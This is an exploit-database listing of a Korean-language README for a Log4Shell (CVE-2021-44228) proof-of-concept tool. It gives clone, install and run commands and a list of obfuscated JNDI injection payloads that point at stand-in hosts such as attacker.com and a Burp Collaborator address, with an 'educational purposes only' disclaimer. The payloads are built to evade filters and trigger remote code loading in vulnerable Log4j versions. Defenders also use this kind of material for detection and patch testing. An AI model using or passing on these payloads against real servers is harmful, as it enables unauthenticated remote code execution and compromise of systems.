Sploitus

exploit

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN70 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PEDROHAVAY-EXPLOIT-CVE-2021-44228
# CVE-2021-44228 – Log4j μΈμ¦λ˜μ§€ μ•Šμ€ RCE

## μ†Œκ°œ

이것은 Log4j μΈμ¦λ˜μ§€ μ•Šμ€ RCE(CVE-2021-44228)에 λŒ€ν•œ κ°œλ… 증λͺ… μ΅μŠ€ν”Œλ‘œμž‡μž…λ‹ˆλ‹€.

이 취약점은 `버전 < 2.15.0`에 영ν–₯을 λ―ΈμΉ©λ‹ˆλ‹€.

μžμ„Έν•œ 정보:

https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j

## κΈ°μ—¬μž

@pedrohavay

# λ©΄μ±… μ‘°ν•­

이 ν”„λ‘œμ νŠΈλŠ” **ꡐ윑 λͺ©μ ** 으둜만 μ œμž‘λ˜μ—ˆμœΌλ©°, 법λ₯  μœ„λ°˜μ΄λ‚˜ 개인적 이읡을 μœ„ν•΄ μ‚¬μš©λ  수 μ—†μŠ΅λ‹ˆλ‹€.

이 ν”„λ‘œμ νŠΈμ˜ μž‘μ„±μžλŠ” 이 ν”„λ‘œμ νŠΈ 자료둜 인해 λ°œμƒν•  수 μžˆλŠ” μ–΄λ– ν•œ 피해에 λŒ€ν•΄μ„œλ„ μ±…μž„μ„ μ§€μ§€ μ•ŠμŠ΅λ‹ˆλ‹€.

# 데λͺ¨

![image](https://assets.kitploit.com/production/public/readmes/30594/134ddfe430e032d583742d3f19eec41bf0f98ac9b3728154be98320775ee900f.gif)

# μ„€μΉ˜

root@kitploit:~
    
    
    git clone https://github.com/pedrohavay/exploit-CVE-2021-44228
    cd exploit-CVE-2021-44228
    pip install -r requirements.txt
    

# μ‚¬μš©λ²•

  1. 슀크립트 μ‚¬μš©

root@kitploit:~
         
         python3 main.py
         




# νŽ˜μ΄λ‘œλ“œ

root@kitploit:~
    
    
    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
    ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
    ${jndi:rmi://adsasd.asdasd.asdasd}
    ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
    ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
    ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
    ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
    ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
    ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://localhost:12345/Exploit}
    

# μš”κ΅¬ 사항

  * Python 3
  * Java (JDK)